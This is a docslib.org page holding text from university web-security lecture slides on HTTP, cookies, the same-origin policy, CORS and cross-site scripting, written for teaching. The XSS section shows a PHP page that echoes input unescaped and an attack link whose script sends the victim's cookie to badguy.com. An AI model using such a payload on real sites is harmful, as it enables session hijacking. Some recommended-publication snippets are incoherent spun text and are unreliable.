DOCSLIB.ORG

Web Security

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Web Security CSE343/443 Lehigh University Fall 2015 Web Security Presenter: Yinzhi Cao Slides Inherited and Modified from Prof. John Mitchell Reported Web Vulnerabilities "In the Wild" 1200 1000 800 Input Validation 600 CSRF XSS SQLi 400 200 0 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 Web application vulnerabilities Goals of web security Safely browse the web n Users should be able to visit a variety of web sites, without incurring harm: w No stolen information (without user’s permission) w Site A cannot compromise session at Site B Secure web applications n Applications delivered over the web should have the same security properties we require for stand- alone applications Network security Network Attacker System Intercepts and controls network communication Alice Web security System Web Attacker Sets up malicious site visited by victim; no control of network Alice Web Threat Models Web attacker n Control attacker.com n Can obtain SSL/TLS certificate for attacker.com n User visits attacker.com w Or: runs attacker’s Facebook app Network attacker n Passive: Wireless eavesdropper n Active: Evil router, DNS poisoning Malware attacker n Attacker escapes browser isolation mechanisms and run separately under control of OS Malware attacker Browsers (like any software) contain exploitable bugs n Often enable remote code execution by web sites n Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware on 18,000 web pages (URLs) Even if browsers were bug-free, still lots of vulnerabilities on the web n All of the vulnerabilities on previous graph: XSS, SQLi, CSRF, … Outline Background n Http n Cookies n Rendering content Isolation Communication Security Case Study n Cross-site scripting n Cross-site Request Forgery n Frame Navigation BACKGROUND HTTP URLs Global identifiers of network-retrievable documents Example: http://columbia.edu:81/class?name=E6121#homework Protocol Fragment Hostname Port Path Query Special characters are encoded as hex: n %0A = newline n %20 or + = space, %2B = + (special exception) HTTP Request Method File HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies COOKIES: CLIENT STATE 15 Cookies Used to store state on user’s machine POST … Browser Server HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; If expires=NULL: expires = (when expires) ; this session only secure = (only over SSL) Browser POST … Server Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user Set-cookie: auth=val auth=val Store val GET restricted.html Cookie: auth=val restricted.html auth=val Check val If YES, YES/NO restricted.html RENDERING CONTENT Rendering Basic execution model n Each browser window or frame w Loads content w Renders n Processes HTML and scripts to display page n May involve images, subframes, etc. w Responds to events Document Object Model (DOM) Object-oriented interface used to read and write docs n web page in HTML is structured data n DOM provides representation of this hierarchy Examples n Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] n Methods: document.write(document.referrer) Also Browser Object Model (BOM) n window, document, frames[], history, location, navigator (type and version of browser) Events Events can be n User actions: OnClick, OnMouseover n Rendering: OnLoad, OnBeforeUnload n Timing: setTimeout(), clearTimeout() Pages can embed content from many sources Frames: <iframe src=“//site.com/frame.html” > </iframe> Scripts: <script src=“//site.com/script.js” > </script> CSS: <link rel="stylesheet" type="text /css” href=“//site/com/theme.css" /> Objects (flash): [using swfobject.js script ] <script> var so = new SWFObject(‘//site.com/flash.swf', …); so.addParam(‘allowscriptaccess', ‘always'); so.write('flashdiv'); </script> ISOLATION Running Remote Code is Risky Integrity n Compromise your machine n Install malware rootkit n Transact on your accounts Confidentiality n Read your information n Steal passwords n Read your email 25 Frame and iFrame Window may contain frames from different sources n Frame: rigid division as part of frameset n iFrame: floating inline frame iFrame example <iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe> Why use frames? n Delegate screen area to content from another source n Browser provides isolation based on frames n Parent may work even if frame is broken Browser Sandbox Goal n Run remote web applications safely n Limited access to OS, network, and browser data Approach n Isolate sites in different security contexts n Browser manages resources, like an OS 27 Analogy Operating system Web browser Primitives Primitives n System calls n Document object model n Processes n Frames n Disk n Cookies / localStorage Principals: Users Principals: “Origins” n Discretionary access control n Mandatory access control Vulnerabilities Vulnerabilities n Buffer overflow n Cross-site scripting n Root exploit n Cross-site request forgery n Cache history attacks n … Policy Goals Safe to visit an evil web site Safe to visit two pages at the same time n Address bar distinguishes them Allow safe delegation Same Origin Policy Origin = protocol://host:port Site A Full access to same origin n Full network access n Read/write DOM n Storage Site A context Site A context COMMUNICATION Overview (4) Server-client in different origin Site A Site B (1) Server-client in the same origin Site A context Site A context Site B context (3) Client-client (2) Client-client in different origin in the same origin Server-client in the same origin Http with no restriction Client-client in the same origin Direct Access handle = window.open(“http://same- origin.org”); handle.contentDocument.getElementById(“m yDiv”); Windows Interact 35 Client-client in different origin postMessage document.domain window.postMessage An API for inter-frame communication n A network-like channel between frames Add a contact Share contacts postMessage syntax frames[0].postMessage("Attack at dawn!", "http://b.com/"); window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); Attack at dawn! Facebook Anecdote Why include “targetOrigin”? What goes wrong? frames[0].postMessage("Attack at dawn!"); Messages sent to frames, not principals n When would this happen? 39 Domain Relaxation www.facebook.com chat.facebook.com www.facebook.comfacebook.com www.facebook.com chat.facebook.comfacebook.com Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain Server-client in different origin Library import CORS (cross origin resource sharing) in HTML5 Library import <script src=https://seal.verisign.com/getseal? host_name=a.com></script> VeriSign • Script has privileges of imported page, NOT source server. • Can script other pages in this origin, load more scripts • Other forms of importing CORS Cross-origin network requests Access-Control-Allow-Origin: <list of domains> Access-Control-Allow-Origin: * Cross Site Scripting (XSS) What is XSS? An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application Methods for injecting malicious code: n Reflected XSS (“type 1”) w the attack script is reflected back to the user as part of a page from the victim site n Stored XSS (“type 2”) w the attacker stores the malicious code in a resource managed by the web application, such as a database n Others, such as DOM-based attacks Taxonomy of XSS Attacks Basic scenario: reflected XSS attack Attack Server 1 visit web site 2 receive malicious link 5 send valuable data 3 click on link Victim client 4 echo user input Victim Server XSS example: vulnerable site search field on victim.com: n http://victim.com/search.php ? term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . </BODY> </HTML> echo search term into response Bad input Consider link: (properly URL encoded) http://victim.com/search.php ? term = <script> window.open( “http://badguy.com?cookie = ” + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> … </script> 3. Browser executes script: w Sends badguy.com cookie for victim.com Attack Server user gets bad link www.attacker.com http://victim.com/search.php ? term = <script> ... </script> user clicks on link Victim client victim echoes user input Victim Server www.victim.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html> Basic scenario: reflected XSS attack Attack Server Email version addr 1 Collect email 2 send malicious email 5 send valuable data 3 click on link User Victim 4 echo user input Server Victim 2006 Example
Load more

Recommended publications
  • Web Application Security
    Web Application Security * Original slides were prepared by John Mitchell Goals of web security Safely browse the web n Users should be able to visit a variety of web sites, without incurring harm: w No stolen information w Site A cannot compromise session at Site B Support secure web applications n Applications delivered over the web should be able to achieve the same security properties as stand- alone applications Web security threat model System Web Attacker Sets up malicious site visited by victim; no control of network Alice Network security threat model Network Attacker System Intercepts and controls network communication Alice System Web Attacker Alice Network Attacker System Alice Web Threat Models Web attacker n Control attacker.com n Can obtain SSL/TLS certificate for attacker.com n User visits attacker.com w Or: runs attacker’s Facebook app, etc. Network attacker n Passive: Wireless eavesdropper n Active: Evil router, DNS poisoning Malware attacker n Attacker escapes browser isolation mechanisms and run separately under control of OS Malware attacker Browsers may contain exploitable bugs n Often enable remote code execution by web sites n Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware on 18,000 web pages (URLs) NOT OUR FOCUS Even if browsers were bug-free, still lots of vulnerabilities on the web n XSS, SQLi, CSRF, … WEB PROGRAMMING BASICS URLs Global identifiers of network-retrievable documents Example: http://columbia.edu:80/class?name=4995#homework Protocol Fragment
    [Show full text]
  • Web Security 1
    Web Security 1 Prof. Raluca Ada Popa Oct 16, 2017 Some content adapted from materials by David Wagner or Dan Boneh Today • We need to cover same-origin policy, cookie policy, CSRF and XSS, But do not need to cover weB injection • ScriBe: Dayeol • Presenter: Rohan, Michael HTTP (Hypertext Transfer Protocol) A common data communication protocol on the weB CLIENT BROWSER WEB SERVER safebank.com/account.html HTTP REQUEST: Alice GET /account.html HTTP/1.1 Smith Host: www.safebank.com Accounts Bill Pay Mail Transfers HTTP RESPONSE: HTTP/1.0 200 OK <HTML> . </HTML> URLs GloBal identifiers of network-retrievaBle resources Example: http://safeBank.com:81/account?id=10#statement Protocol Hostname Query Fragment Port Path HTTP CLIENT BROWSER WEB SERVER safebank.com/account.html HTTP REQUEST: Alice GET /account.html HTTP/1.1 Smith Host: www.safebank.com Accounts Bill Pay Mail Transfers HTTP RESPONSE: HTTP/1.0 200 OK <HTML> . </HTML> HTTP Request GET: no Method Path HTTP version Headers side effect GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, POST: image/jpeg, */* Accept-Language: en possiBle Connection: Keep-Alive User-Agent: Chrome/21.0.1180.75 (Macintosh; side effect Intel Mac OS X 10_7_4) Host: www.safebank.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET HTTP CLIENT BROWSER WEB SERVER safebank.com/account.html HTTP REQUEST: Alice GET /account.html HTTP/1.1 Smith Host: www.safebank.com Accounts Bill Pay Mail Transfers HTTP RESPONSE: HTTP/1.0 200 OK <HTML> . </HTML> HTTP Response HTTP version Status code
    [Show full text]
  • Front 01: HTML Y
    HTML Y CSS FRONT PRIMERA PARTE Guía para directivos y técnicos V.1 Front HTML y CSS Este documento forma parte de las guías de onboarding de Autentia. Si te apasiona el desarrollo de software de calidad ayúdanos a difundirlas y anímate a unirte al equipo. Este es un documento vivo y puedes encontrar la última versión, así como el resto de partes que completan este documento, en nuestra web. https://www.autentia.com/libros/ Esta obra está licenciada bajo la licencia Creative Commons Attribution ShareAlike 4.0 International (CC BY-SA 4.0) FRONT - HTML Y CSS Hoy en día el negocio está en la que se publican y organizan los red. Es en el mercado on-line contenidos, además del grado donde se producen la mayor parte de usabilidad y accesibilidad de de los intercambios comerciales los mismos, influye directamente entre clientes y proveedores. en el posicionamiento que los El primer contacto de nuestros motores de búsqueda asignan a usuarios con nuestro negocio, y las aplicaciones. en muchos casos el único, es a través de una aplicación web o móvil. No disponer de un diseño atractivo, una experiencia de usuario agradable, accesible y que se adapte de manera adecuada para ser usada en diferentes dispositivos (Responsive), es garantía de una pérdida masiva de potenciales clientes. De la misma manera, la forma en la FRONT - HTML Y CSS “No hay una segunda oportunidad para una primera impresión” Alcanzar la habilidad de realizar diseños profesionales y usables no es algo baladí y se necesita un conocimiento profundo en marketing digital, experiencia de usuario y en tecnologías front-end.
    [Show full text]
  • Php Server Http Referer
    Php Server Http Referer Dorian view partly if deprivable Gunter riled or dilacerates. Sometimes retired Randi wheedle her Klansman rather, but bright Aubrey sell unfriendly or remigrated iwis. Petrological and coldish Caleb announcing: which Ethelred is paraffinic enough? The new approach though has some view this request headers of injection in php people out on. Returns a typical usage of a newsletter, often responsible for? Restricting access that is file path info is possible thing about your visitor know where a video calls out there was? There view be some incompatibility going today with every particular setup. HTTPREFERER and parsestr in a Snippet MODX. Learn how Cloudflare handles HTTP request headers to appropriate origin web server and what headers Cloudflare adds to proxied requests. This do a tube while __DIR__ give the realpath. Specify an ssh session or more in a website out how would give you intend on his choice; servers using csrf token are you. In most reverse proxy setup the web server forwards the HTTP request it received from the. With Contact Form 7 you know capture this referer page and was it to. Static-only applications serve files through each WebFaction server's front-end. Is then any difference between sale a lead tracking? IfissetSERVER'HTTPREFERER' return false refererhost. The term Referer is used due only a spelling error its the original HTTP. Echo filegetcontents'httpmyotherdomaincom' I created an non Codeigniter script at myotherdomaincomindexphp and added this code. There it actually nine HTTP methods defined by the HTTP specification, but many love them affect not widely used or supported.
    [Show full text]
  • Document Object Model
    Document Object Model CITS3403: Agile Web Development Semester 1, 2021 Introduction • We’ve seen JavaScript core – provides a general scripting language – but why is it so useful for the web? • Client-side JavaScript adds collection of objects, methods and properties that allow scripts to interact with HTML documents dynamic documents client-side programming • This is done by bindings to the Document Object Model (DOM) – “The Document Object Model is a platform- and language-neutral interface that will allow programs and scripts to dynamically access and update the content, structure and style of documents.” – “The document can be further processed and the results of that processing can be incorporated back into the presented page.” • DOM specifications describe an abstract model of a document – API between HTML document and program – Interfaces describe methods and properties – Different languages will bind the interfaces to specific implementations – Data are represented as properties and operations as methods • https://www.w3schools.com/js/js_htmldom.asp The DOM Tree • DOM API describes a tree structure – reflects the hierarchy in the XTML document – example... <html xmlns = "http://www.w3.org/1999/xhtml"> <head> <title> A simple document </title> </head> <body> <table> <tr> <th>Breakfast</th> <td>0</td> <td>1</td> </tr> <tr> <th>Lunch</th> <td>1</td> <td>0</td> </tr> </table> </body> </html> Execution Environment • The DOM tree also includes nodes for the execution environment in a browser • Window object represents the window displaying a document – All properties are visible to all scripts – Global variables are properties of the Window object • Document object represents the HTML document displayed – Accessed through document property of Window – Property arrays for forms, links, images, anchors, … • The Browser Object Model is sometimes used to refer to bindings to the browser, not specific to the current page (document) being rendered.
    [Show full text]
  • Add Request Header Ie
    Add Request Header Ie Witted Roderigo sometimes advertizes his gelatiniser stutteringly and colludes so immaculately! Berk bedights her Ludwigshafen sprightly, she vitalize it incoherently. Coseismic and grammatical Ruben charts almost betweentimes, though Israel comport his micrurgy shaking. This allows older versions of Internet Explorer and Chrome to perform. Content-Security-Policy Header CSP Reference & Examples. Servlet Tutorial Specifying HTTP Response Headers. The developer tools in some form of events of giving hint of microsoft wants for example, javascript to add request has higher precedence than being annotated by adding searchbar and add a character may support. How can Add HTTP Security Headers in WordPress Tripwire. Authoritative guide to CORS Cross-Origin Resource Sharing. Security HTTP Headers Prevent XSS Attack Clickjacking. IE Tab Documentation IE Tab Run Internet Explorer inside. Fix on a unique identifiers that lets us a fresh from accessing information about this saves you to gateway caches will need to add request shortly and low bandwidth utilization. It's a shortcut for setting the header via the usual header notation http url. How a View HTTP Headers Cookies In Google Chrome. This wrong be truth with Chrome Firefox Safari and IE. It means of the error logs, if this request header by pointing one! Internet Explorer Open their Network tool using Ctrl4 You must manually start data collection using F5 Once and have some may simply warn-click on same name of any insulate to gleam the HTTP headers as well upon Request Method Response Status Code and HTTP version in relevant panels related to it. IIS allows you to break custom HTTP headers You groom have.
    [Show full text]
  • A Web Server Called Liso
    15-441/641: Computer Networks Project 1: A Web Server Called Liso TAs: Mingran Yang ([email protected]) Alex Bainbridge ([email protected]) September 29, 2019 1 Introduction In this class you wil learn about Computer Networks, from bits on a wire or radio (`the bottom') all the way up to the design of applications that run over networks (`the top)'. In this project, you will start from the top with an application we are all familiar with: a web server. You will use the Berkeley Sockets API to write a web server using a subset of the HyperText Transport Protocol (HTTP) 1:1 |RFC 2616 [2]. Your web server will also implement HyperText Transport Protocol Secure (HTTPS) via Transport Layer Security (TLS) as described in RFC 2818 [3]. Students enrolled under the 15-641 course number will implement the Common Gateway Interface (CGI) as described in RFC 3875 [4]. Reading an RFC is quite different from reading a news article, mystery novel, or even technical paper. Appendix B.2 has some tips read and use and RFC efficiently. RFCs are one of many ways the Internet declares `standards:' agreed upon algorithms, wire formats, and protocols for interoperability between different implementations of systems on a network. Without standards, software from one company would not be able to talk to software from another company and we would not have things like e-mail, the Web, or even the ability to route traffic between different companies or countries. Because your web server is compatible with these standards, you will, by the end of this project, be able to browse the content on your web server using standard browser like Chrome or Firefox.
    [Show full text]
  • Web Application Security
    CS 155 Spring 2016 Web Application Security 47,350,400 John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are obtained from other sources, a a reference will be noted on the bottom of that slide. A full list of references is provided on the last slide. WordPress Vulnerabilities Versio Added Title n 4.4.1 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.4.1 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect 4.4 2016-01-06 WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS) 4.4 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.4 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect 4.3.2 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.3.2 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect 4.3.1 2016-01-06 WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS) 4.3.1 2016-01-06 WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS) 4.3.1 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.3.1 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting 4.3 2015-09-15 (XSS) 4.3 2015-09-15 WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS) 4.3 2015-09-15 WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue 4.3 2016-01-06 WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS) 4.3 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.3 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect 4.2.6 2016-02-02 WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF) 4.2.6 2016-02-02 WordPress 3.7-4.4.1 - Open Redirect OWASP Top Ten (2013) A-1 Injection Untrusted data is sent to an interpreter as part of a command or query.
    [Show full text]
  • Javascript and Embedded Objects
    Color profile: Generic CMYK printer profile Composite Default screen Complete Reference / JavaScript: TCR / Powell & Schneider / 225357-6 / Chapter 18 Blind Folio 557 18 JavaScript and Embedded Objects odern browsers support many technologies beyond (X)HTML, CSS, and JavaScript. A wide variety of extra functionality is available in the form of browser plug-ins, MActiveX controls, and Java applets. These technologies provide extended capabilities that can make Web pages appear more like applications than marked-up text. Embedded objects provide a natural complement to the limited capabilities of scripting languages like JavaScript. Embedded objects come in many forms, but the most popular are multimedia in nature. A good example is Macromedia Flash files, which allow designers to add advanced vector graphics and animation to Web sites. Various other types of embedded video, sound, and live audio are also quite popular. Embedded Java applets are often included in pages that require more advanced graphics, network, or processing functionality. Browsers provide the bridge that facilitates communication between JavaScript and embedded objects. The way this communication is carried out is essentially non-standardized, although browser vendors adhere to their own ad hoc “standards,” which are in widespread use. Even so, there are numerous concerns when dealing with embedded objects. First, including them makes the assumption that the user’s browser has the capability to handle such objects. Second, even if the user does have an appropriate extension installed, many users find embedded objects annoying because they increase download time while only occasionally improving the overall utility of the site. Third, users with older browsers and users on non-Windows platforms are often unable to use embedded objects because of lack of support.
    [Show full text]
  • Rootkits for Javascript Environments
    Rootkits for JavaScript Environments Ben Adida Adam Barth Collin Jackson Harvard University UC Berkeley Stanford University ben [email protected] [email protected] [email protected] Abstract Web Site Bookmarklet Web Site Bookmarklet A number of commercial cloud-based password managers use bookmarklets to automatically populate and submit login forms. Unfortunately, an attacker web Native JavaScript environment site can maliciously alter the JavaScript environment and, when the login bookmarklet is invoked, steal the Figure 1. Developers assume the bookmarklet in- user’s passwords. We describe general attack tech- teracts with the native JavaScript environment directly niques for altering a bookmarklet’s JavaScript envi- (left). In fact, the bookmarklet’s environment can be ronment and apply them to extracting passwords from manipulated by the current web page (right). six commercial password managers. Our proposed solution has been adopted by several of the commercial vendors. If the user clicks a bookmarklet while visiting an untrusted web page, the bookmarklet’s JavaScript is run in the context of the malicious page, potentially 1. Introduction letting an attacker manipulate its execution by care- fully crafting its JavaScript environment, essentially One promising direction for building engaging web installing a “rootkit” in its own JavaScript environment experiences is to combine content and functionality (See Figure 1). Instead of interacting with the native from multiple sources, often called a “mashup.” In JavaScript objects, the bookmarklet interacts with the a traditional mashup, an integrator combines gadgets attacker’s objects. This attack vector is not much of (such as advertisements [1], maps [2], or contact a concern for Delicious’ social bookmarking service, lists [3]), but an increasingly popular mashup design because the site’s own interests are served by advertis- involves the user adding a bookmarklet [4] (also known ing its true location and title.
    [Show full text]
  • Web Security: Session Management
    CS155 Web Security: Session Management *Original slides were created by Prof. Dan Boneh Same origin policy: review Review: Same Origin Policy (SOP) for DOM: – Origin A can access origin B’s DOM if match on (scheme, domain, port) This lecture: Same Original Policy (SOP) for cookies: – Based on: ([scheme], domain, path) optional scheme://domain:port/path?params Setting/deleting cookies by server GET … Browser HTTP Header: Server Set-cookie: NAME=VALUE ; domain = (when to send) ; scope if expires=NULL: path = (when to send) this session only secure = (only send over SSL); if expires=past date: expires = (when expires) ; browser deletes cookie HttpOnly Default scope is domain and path of setting URL Scope setting rules (write SOP) domain: any domain-suffix of URL-hostname, except TLD example: allowed domains disallowed domains host = “login.site.com” login.site.com other.site.com .site.com othersite.com ⇒ login.site.com can set cookies .com for all of .site.com but not for another site or TLD Problemac for sites like .stanford.edu (and some hosQng centers) path: can be set to anything Cookies are identified by (name,domain,path) cookie 1 cookie 2 name = userid name = userid value = test value = test123 domain = login.site.com domain = .site.com path = / path = / secure secure disQnct cookies Both cookies stored in browser’s cookie jar both are in scope of login.site.com Reading cookies on server (read SOP) Browser GET //URL-domain/URL-path Server Cookie: NAME = VALUE Browser sends all cookies in URL scope: • cookie-domain is domain-suffix of
    [Show full text]
  • Secure Session Management
    Secure Session Management Fariha Nazmul Kongens Lyngby 2011 IMM-M.Sc.-2011-45 Technical University of Denmark Informatics and Mathematical Modelling Building 321, DK-2800 Kongens Lyngby, Denmark Phone +45 45253351, Fax +45 45882673 [email protected] www.imm.dtu.dk IMM-M.Sc.-2011-45 Preface The stateless behavior of HTTP requires web application developers to use sepa- rate stateful or stateless mechanisms with HTTP for maintaining state and user specific session information. The task of maintaining user based state informa- tion in a logical connection between the server and the user device is known as session. Web session management is a method that allows the web server to exchange state information to recognize and track every user connection. A critical issue in web security is the ability to bind user authentication and access control to unique sessions. Vulnerabilities in the session management pro- cess can cause serious damage since the sessions generally maintain important and sensitive data of the web based systems. The aim of this Master thesis is to concentrate on the security of session man- agement in a single server environment. The thesis focuses on analyzing the important aspects of a secure session management mechanism that are the abil- ity to bind an incoming request to the session it belongs to, to determine where and how the session state can be stored and to find out measures to protect the session handling mechanisms from security attacks. In addition, this the- sis shows the basic steps of implementing a session with PHP and discusses the implications of manipulating some of the session management configuration options on the security level of the application.
    [Show full text]